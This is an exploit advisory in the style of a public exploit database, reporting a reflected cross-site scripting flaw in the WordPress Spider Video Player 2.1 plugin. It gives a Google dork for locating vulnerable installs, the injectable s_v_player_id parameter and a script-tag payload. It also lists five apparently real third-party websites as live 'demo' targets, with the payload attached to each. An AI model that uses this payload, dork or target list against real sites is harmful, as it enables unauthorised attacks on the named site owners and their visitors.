====================================================================
# Exploit Title : WordPress Spider Video Player 2.1 Cross site scripting
Vulnerability

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://web-dorado.com/

# Google Dork : inurl:wp-content/plugins/player/settings.php

# Date: 2013-12-09

# Tested on: Windows 7 & Linux

# discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross site scripting
#
# Location :
localhost/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
#
http://www.adethefade.com/wp-content/plugins//player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
http://www.beton-mobile-tp.fr/blog-beton/wp-content/plugins//player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
www.sonorapalaciosjr.cl/demos/wordpress/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
#
http://www.extravagancelingerie.com.br/site/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
#
http://www.cintro.com.br/wordpress/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=
"/><script>alert(1);</script>
#
######################